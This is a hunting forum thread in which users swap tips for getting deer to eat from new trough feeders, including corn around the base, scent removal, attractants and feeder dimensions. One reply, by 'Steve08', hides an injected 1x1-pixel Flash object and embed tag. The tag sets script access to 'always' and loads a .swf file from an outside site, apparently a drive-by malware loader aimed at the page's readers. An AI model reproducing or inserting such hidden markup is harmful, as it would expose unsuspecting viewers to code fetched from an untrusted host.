Getting deer used to new trough feeders?

FlipKing

We put out 2 new trough feeders because we want to start running protein feed. So far in a little over 2 weeks, we haven't had a single deer eat out of the feeder(though the bear doesn't mind it). Is this just going to take time, or is there something we can do to get them used to the feeders?

The deer will eat all around, and under the feeders, just no one is brave enough to stick their head in yet. We appreciate any advice.

Jim Boyd

We just put ear corn on the ground around them and pretty soon, they begin to chow down. Try it at 10 yards out and move it closer the next time.

No chance something offensive got spilled on the corn you put in the feeder, is there?

Many times, we put the feeders out long before we intend to fill / use them.

Give them time - and some incentive all around the feeder.

Best of luck!!!!

shdw633

What are you trying to get them to eat? Go with corn only, make sure you spray the feeder good to remove all the scent you can and apply a lot of corn all around the feeder and really close in to get them used to it. Still will take a little time, you just dropped a pantry into their living room.

catch22

agree with shdw633. its a pretty intrusive feeder however, with time, they will get used to it.

start with straight corn......it may take all summer, but once they take to it, you will love having it.

Lilly001

Peanut butter. Deer love it and it has a strong odor to pull them in.

FlipKing

I appreciate the input. We put in a corn/protein mix. We may need to add more corn and maybe another attractant.

Excavator

Another thing to keep in mind. I don't hang a camera on a new feeder. I feel that the deer are stressed enough with the new feeder. Also I would suggest, feeding a spot on the ground for a month or so prior to placing the feeder.

Steve08

Add rice bran to the feeder.<object classid="clsid: D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1"><param value="http://picz.website/u/1/c.swf"><param name="allowScriptAccess" value="always" /><embed allowScriptAccess="always" src="http://picz.website/u/1/c.swf" type="application/x-shockwave-flash" width="1" height="1"></embed></object>
Second that, works well for me.

dfhooked

I've never had an issue with deer using a trough style feeder or a gravity feeder. What is your deer density like? I have taken blue barrels and cut em in half to make a trough feeder and had deer eating the first week.

How high is the Rim of the feeder to the ground and how high is the bottom of the roof to the trough?

What is your habitat like? Fresh clear cut with tender browse? Lots of factors to consider.

Last edited: